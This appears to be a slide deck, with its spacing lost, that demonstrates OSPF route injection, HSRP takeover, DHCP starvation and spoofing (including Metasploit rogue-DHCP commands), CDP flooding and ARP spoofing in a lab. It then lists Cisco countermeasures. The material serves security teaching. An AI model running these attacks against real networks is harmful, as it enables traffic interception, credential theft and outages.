network attack counter
TRANSCRIPT
Common Network Attacks and
Countermeasures
Content
• OSPFNeighbor/RouteInjection
• HSRPActiveRouterManipulation
• DHCPStarvationandSpoofing
• CDPNeighborOverflow
• IPARPSpoofing
• Countermeasures
OSPFNeighbor/RouteInjection
Scenario:
- AttackerandtwoOSPF-enabledroutersareinthesamenetwork.
- AttackeractsasOSPFrouter
- AttackersendsOSPFpacketstomanipulaterouters’neighbortablesandroutingtables
OSPFNeighbor/RouteInjection
Originalneighbortablesonbothrouters
R1#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.21FULL/DR00:00:35192.168.0.2FastEthernet1/0
R2#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.11FULL/BDR00:00:30192.168.0.1FastEthernet2/0
OSPFNeighbor/RouteInjection
Originalroutingtablesonbothrouters
R1#showip route
Gatewayoflastresortisnotset
C192.168.0.0/24isdirectlyconnected,FastEthernet1/0
R2#showip route
Gatewayoflastresortisnotset
C192.168.0.0/24isdirectlyconnected,FastEthernet2/0
OSPFNeighbor/RouteInjection
LOKI:apythonbasedinfrastructurepentestingtoolfocusingonlayer3protocols.
OSPFNeighbor/RouteInjection
SendingOSPFPacketsfromAttackerusingLoki
OSPFNeighbor/RouteInjection
SendingOSPFPacketsfromAttackerusingLoki
OSPFNeighbor/RouteInjectionSendingOSPFPacketsfromAttackerusingLoki
OSPFNeighbor/RouteInjection
SendingOSPFPacketsfromAttackerusingLoki
OSPFNeighbor/RouteInjection
AnotherneighborcomesupinR1anR2
R1#*Feb2008:27:58.479:%OSPF-5-ADJCHG:Process100,Nbr 192.168.0.11onFastEthernet1/0fromLOADINGtoFULL,LoadingDone
R1#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.21FULL/DR00:00:39192.168.0.2FastEthernet1/0192.168.0.111FULL/DROTHER00:00:37192.168.0.11FastEthernet1/0
OSPFNeighbor/RouteInjection
AnotherneighborcomesupinR1anR2
R2#*Feb2008:27:58.639:%OSPF-5-ADJCHG:Process100,Nbr 192.168.0.11onFastEthernet2/0fromLOADINGtoFULL,LoadingDoneR2#R2#R2#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.11FULL/BDR00:00:34192.168.0.1FastEthernet2/0192.168.0.111FULL/DROTHER00:00:39192.168.0.11FastEthernet2/0R2#
OSPFNeighbor/RouteInjectionInjectnetwork10.0.0.0/24toOSPFroutingtable
OSPFNeighbor/RouteInjection
Network10.0.0.0/24appearsinroutingtablesofbothrouters
R1#showip route
Gatewayoflastresortisnotset
10.0.0.0/24issubnetted,1subnetsO10.0.0.0[110/2]via192.168.0.11,00:00:59,FastEthernet1/0C192.168.0.0/24isdirectlyconnected,FastEthernet1/0
R2#showip route
Gatewayoflastresortisnotset
10.0.0.0/24issubnetted,1subnetsO10.0.0.0[110/2]via192.168.0.11,00:00:54,FastEthernet2/0C192.168.0.0/24isdirectlyconnected,FastEthernet2/0
HSRPActiveRouterManipulation
Scenario:
- TworoutersareenabledHSRP.
- AttackersendsnecessarypacketstoescalatehimselfasActiveRouter
- Attackernowservesasvirtualgateway.
- AlltrafficsfromUseraresentviaAttacker
HSRPActiveRouterManipulation
Overview
• HotStandbyRouterProtocol(HSRP)providesdefaultgatewayredundancyusingoneactiveandonestandbyrouter.
• Thepriorityvaluecanbefrom0to255.Thedefaultvalueis100.
• DuringtheActiveRouterelectionprocess,therouterwiththehighestpriorityinanHSRPgroupbecomestheactiverouter.Ifatieoccurs,therouterwiththehighestconfiguredIPaddressbecomesactive
HSRPActiveRouterManipulationNormalOperation:R2isactiverouterandR1isstandbyrouter
R1#showstandbyFastEthernet1/0- Group1StateisStandby1statechange,laststatechange00:00:38VirtualIPaddressis192.168.0.254ActivevirtualMACaddressis0000.0c07.ac01LocalvirtualMACaddressis0000.0c07.ac01(v1default)Hellotime3sec,holdtime10secNexthellosentin2.704secsPreemptionenabledActiverouteris192.168.0.2,priority100(expiresin10.400sec)StandbyrouterislocalPriority100(default100)Groupnameis"hsrp-Fa1/0-1"(default)
HSRPActiveRouterManipulation
UseLokitomanipulateHSRPActiveRouter
HSRPActiveRouterManipulation
WhenAttackOccurred:R2changeditselftostandbyrouter
R2#*Feb2012:32:13.443:%HSRP-5-STATECHANGE:FastEthernet2/0Grp 1stateActive->Speak
R2#*Feb2012:32:24.447:%HSRP-5-STATECHANGE:FastEthernet2/0Grp 1stateSpeak->StandbyR2#
HSRPActiveRouterManipulation
WhenAttackOccurred:AttackersbecameActiveRouterwithpriority255
R2#showstandbyFastEthernet2/0- Group1StateisStandby4statechanges,laststatechange00:00:23VirtualIPaddressis192.168.0.254ActivevirtualMACaddressis0050.56c0.0002LocalvirtualMACaddressis0000.0c07.ac01(v1default)Hellotime3sec,holdtime10secNexthellosentin1.056secsPreemptionenabledActiverouteris192.168.0.11,priority255(expiresin10.496sec)StandbyrouterislocalPriority100(default100)Groupnameis"hsrp-Fa2/0-1"(default)
DHCPStarvationandPoisoning
Scenario:
• R1isauthorizedDHCPserver
• UsersgetsIPsfromR1
• AttackertakesdowntheDHCPServer
• AttackerclaimshimselfasDHCPServer
• UsersgetsfakeIPsprovidedbyAttackerincludedDNSanddefaultgateway
• AttackernowcanservefakeDNSserviceorsniffusers’traffic
DHCPStarvation:TakingdowntherealDHCPServerbygeneratingmanymany DHCP
DHCPStarvationandPoisoning
DHCPStarvation:DHCPpoolisnowfullwithfakeclients
DHCPStarvationandPoisoning
DHCPStarvation:DHCPserverisunabletoserveIPsmoretonextusers’request
R1#showip dhcp pool
PoolDHCP:Utilizationmark(high/low):100/0Subnetsize(first/next):0/0Totaladdresses:254Leasedaddresses:253Pendingevent:none1subnetiscurrentlyinthepool:CurrentindexIPaddressrangeLeasedaddresses0.0.0.0192.168.0.1- 192.168.0.254253R1#R1#
DHCPStarvationandPoisoning
DHCPSPoofing:AttackerrunsDHCPserverwithfakeDNSIPorGateway
msf >useauxiliary/server/dhcpmsf auxiliary(dhcp)>setrouter192.168.0.1router=>192.168.0.1
msf auxiliary(dhcp)>setnetmask 255.255.255.0netmask =>255.255.255.0
msf auxiliary(dhcp)>setdnsserver 172.16.0.1dnsserver =>172.16.0.1
msf auxiliary(dhcp)>setsrvhost 192.168.0.11srvhost =>192.168.0.11
msf auxiliary(dhcp)>run[*]Auxiliarymoduleexecutioncompleted
[*]StartingDHCPserver...msf auxiliary(dhcp)>
DHCPStarvationandPoisoning
DHCPSpoofing:NewusernowgetIPfromfakeDHCPserver
EthernetadapterVMwareNetworkAdapterVMnet2:
Connection-specificDNSSuffix.:Description...........:VMwareVirtualEthernetAdapterforVMnet2IPv4Address...........:192.168.0.33(Preferred)SubnetMask...........:255.255.255.0LeaseObtained..........:Monday,February20,201711:23:39PMLeaseExpires..........:Monday,February20,201711:33:39PMDefaultGateway.........:192.168.0.1DHCPServer...........:192.168.0.11
DNSServers...........:172.16.0.1
DHCPStarvationandPoisoning
CDPNeighborOverflow
Scenario:
• AttackertriestofloodCDPpacketsintonetwork
• CDPtablesinroutersarefullwithfakedevices
FloodingCDPpacket:UsingYersiniatogeneratepackets
CDPNeighborOverflow
FloodingCDPpacket:Wireshark capturesatportfacetoattacker
CDPNeighborOverflow
FloodingCDPpacket:CDPtablesatRouters
CDPNeighborOverflow
FloodingCDPpacket:Processingpacketseatsuptherouter’sCPU
R2#showprocessescpu sortedCPUutilizationforfiveseconds:97%/100%;oneminute:74%;fiveminutes:25%PIDRuntime(ms)InvokeduSecs 5Sec1Min5MinTTYProcess7613403238953441170.66%42.54%14.98%0CDPProtocol9119584560349715.19%18.81%5.12%0Exec55112359142392.87%1.10%0.41%0Checkheaps
CDPNeighborOverflow
ARPSpoofing
Scenario:
• R1isgatewaytoroutetrafficfromUser
• UsersendsARPrequestforMACofR1.
• AttackerrepliestoARPrequestsandprovideshisownMACaddresstoUser
• AlldataUserissenttoAttackerandthenisforwardedtoR1
ARPSpoofing
BeforeSpoofingAttack:
• UsersendsARPrequesttotheNetworkaskingforMACAddressofGateway192.168.0.1.
• RouterrepliestotheRequestwithitsMACAddresswhichisca01.06e5.001c.
ARPSpoofing
BeforeSpoofingAttack:AddressInfo.atR1
MACAddressofR1
R1#showint f1/0|i addressHardwareisDEC21140,addressisca01.06e5.001c (bia ca01.06e5.001c)Internetaddressis192.168.0.1/24R1#
ARPcacheinR1
R1#showip arp 192.168.0.3ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.30ca05.0790.0000 ARPAFastEthernet1/0R1#
ARPSpoofing
BeforeSpoofingAttack:AddressInfo.atUser
MACAddressofUser
User#show int f0/0|i addressHardwareisDEC21140,addressisca05.0790.0000(bia ca05.0790.0000)Internetaddressis192.168.0.3/24User#
ARPcacheinUser
User#show ip arp 192.168.0.1ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.10ca01.06e5.001cARPAFastEthernet0/0User#User#
ARPSpoofingStartSpoofingAttack:
MACAddressofAttacker
eth0:<BROADCAST,MULTICAST,UP,LOWER_UP>mtu 1500qdisc pfifo_fast stateUPgroupdefaultqlen 1000link/ether00:0c:29:0a:b4:51 brd ff:ff:ff:ff:ff:ffinet 192.168.0.11/24brd 192.168.0.255scopeglobaleth0
ARPSpoofingStartSpoofingAttack:UseEttercap todoARPspoofing
ScanningHosts
ARPSpoofing
StartSpoofingAttack:UseEttercap todoARPspoofing
Startspoofing
ARPSpoofing
StartSpoofingAttack:
SniffingatinterfaceofUsermachinewithwireshark
ARPSpoofingAfterSpoofingAttack:
Showip arp andfoundMACAddresseshavebeenspoofed
User#show ip arp 192.168.0.1ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.10 000c.290a.b451 ARPAFastEthernet0/0
R1#showip arp 192.168.0.3ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.30000c.290a.b451 ARPAFastEthernet1/0R1#
ARPSpoofing
AfterSpoofingAttack:
TrytotelnetfromUsertoR1
User#telnet 192.168.0.1Trying192.168.0.1...Open
UserAccessVerification
Username:porhaiPassword:R1>R1>R1>
ARPSpoofingAfterSpoofingAttack:Wireshark capturedatAttackermachine
ARPSpoofingAfterSpoofingAttack:FollowTCPStream
ExploitationTools
• Loki• MultiprotocolLabelSwitching(MPLS)• RoutingProtocol• FirstHopRedundancyProtocol• CiscoWirelessLANContextControlProtocol(WLCCP)• InternetControlMessageProtocolversion6(ICMP6)• TCP-MD5• AddressResolutionProtocol(ARP)• DOT1Q
ExploitationTools
• Yersinia• SpanningTreeProtocol(STP)• CiscoDiscoveryProtocol(CDP)• DynamicTrunking Protocol(DTP)• DynamicHostConfigurationProtocol(DHCP)• IEEE802.1Q• IEEE802.1X• Inter-SwitchLinkProtocol(ISL)• VLANTrunking Protocol(VTP)• HotStandbyRouterProtocol(HSRP)
ExploitationTools
• Ettercap• Puttingthenetworkinterfaceintopromiscuousmode• ARPspoofing• ARPpoisoning• Passwordcollectors• Packetfiltering/modifying/dropping• OSfingerprinting• Networkscanning
Countermeasures• OpenShortestPathFirst(OSPF)• Setup messagedigestkeyforOSPFauthentication
• Perinterface:ipospf message-digest-keykey_idmd5complex_password
• EnableOSPFmessagedigestauthentication• Global:areaarea_id authenticationmessage-digest• Perinterface:ipospf authenticationmessage-digest
• Configurepassiveinterface• OSPFsub-command:passive-interfacedefault• OSPFsub-command: passive-interfaceinterface_typeinterface_id
Countermeasures• EnhancedInteriorGatewayRoutingProtocol(EIGRP)
• SetupmessagedigestkeyforEIGRPauthentication• Perinterface:keychainkey_chain_name• Keychainsub-command:key key_id• Keychainkeysub-command:key-stringcomplex_password
• EnableEIGRPmessagedigestauthentication• Perinterface:ipauthenticationkey-chaineigrp AS_numberkey_chain_name
• Perinterface:ipauthenticationmodeeigrp AS_numbermd5
• Configurepassiveinterface• OSPFsub-command:passive-interfacedefault• OSPFsub-command: passive-interfaceinterface_type interface_id
Countermeasures
• HotStandbyRouterProtocol(HSRP)• EnableHSRPmessagedigestwithkey-string
• Perinterface:standbygroup_id authenticationmd5key-stringcomplex_password
• Setupmessagedigestwithkey-chainforHSRPauthentication• Perinterface:keychainkey_chain_name• Keychainsub-command:key key_id• Keychainkeysub-command:key-stringcomplex_password
Countermeasures• EnableHSRPmessagedigestwithkey-chain
• Perinterface:standbygroup_id authenticationmd5key-chainkey_chain_name
• SetHSRPprioritytohighest(255)• Perinterface:standbygroup_id prioritypriority_number
• SetHSRPinterfaceIPtohighest• Perinterface:ipaddressip_address subnet_mask
Countermeasures
• VirtualRouterRedundancyProtocol(VRRP)• EnableVRRPmessagedigestwithkey-string
• Perinterface:vrrp group_id authenticationmd5key-stringcomplex_password
• Setupmessagedigestwithkey-chainforVRRPauthentication• Perinterface:keychainkey_chain_name• Keychainsub-command:key key_id• Keychainkeysub-command:key-stringcomplex_password
Countermeasures
• EnableVRRPmessagedigestwithkey-chain• Perinterface:vrrp group_id authenticationmd5key-chainkey_chain_name
• SetVRRPprioritytohighest(254)• Perinterface:vrrp group_id prioritypriority_number
• SetHSRPinterfaceIPtohighest• Perinterface:ipaddressip_address subnet_mask
• SetupVRRPexplicitlyactiverouter• Perinterface:vrrp group_id ipip_of_physical_interface• Perinterface:vrrp group_id ipv6ip_of_physical_interface
Countermeasures
• CiscoDiscoveryProtocol(CDP)• ShowCiscoDiscoveryProtocolstatus
• showcpd interface
• DisableCiscoDiscoveryProtocol• Global:nocdp run• Perinterface:nocdp enable
Countermeasures
• DynamicHostConfigurationProtocol(DHCP)• ShowDHCPSnoopingstatus
• showip dhcp snooping
• SetupDHCPSnoopingtrustedinterface• Perinterface:ip dhcp snoopingtrust
• EnableDHCPSnooping• Global:ip dhcp snooping• Perinterface:ipdhcpsnoopingvlanvlan_id
Countermeasures• ShowPort-Securitystatus
• showport-securityinterfaceinterface_type interface_id
• EnablePort-Security• Perinterface:switchport modeport-security
• LimitthenumberofMACaddresslearnoninterface• Perinterface:switchport port-securitymaximumnumber_of_mac_address
• SetPort-Securityviolationmode• Perinterface:switchport port-securityviolationviolation_mode
Countermeasures• AddressResolutionProtocol(ARP)
• EnableDynamicARPInspection• Global:ip arp inspectionvlan vlan_id
• EnableDHCPSnooping• Global:ip dhcp snooping• Perinterface:ipdhcpsnoopingvlanvlan_id
• EnableIPSourceGuardwithDHCPSnooping• Perinterface:ip verifysourcevlan dhcp-snooping
• BindingMACaddressandstaticIPaddressforIPSourceGuard• Global:ip sourcebindingmac_address vlan vlan_id ip_addressinterfaceinterface_name
Q&A
ThankYou!^^